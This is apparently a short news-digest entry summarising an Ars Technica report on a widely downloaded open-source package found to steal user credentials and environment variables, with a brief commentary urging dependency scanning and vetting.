Open source package with 1 million monthly downloads stole user credentials
A popular open-source package, which is downloaded over a million times per month, was found to contain malicious code. The compromised library actively harvested user credentials and other sensitive environment variables from machines where it was installed.
MY TAKE
This is another stark reminder that supply chain security is not an abstract problem, it is a clear and present danger. It is crucial to have automated scanning and robust vetting processes for all third-party dependencies in your projects.
“Open source package with 1 million monthly downloads stole user credentials” from Ars Technica (https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/) [Mon, 27 Apr 2026 21:04:03 +0000]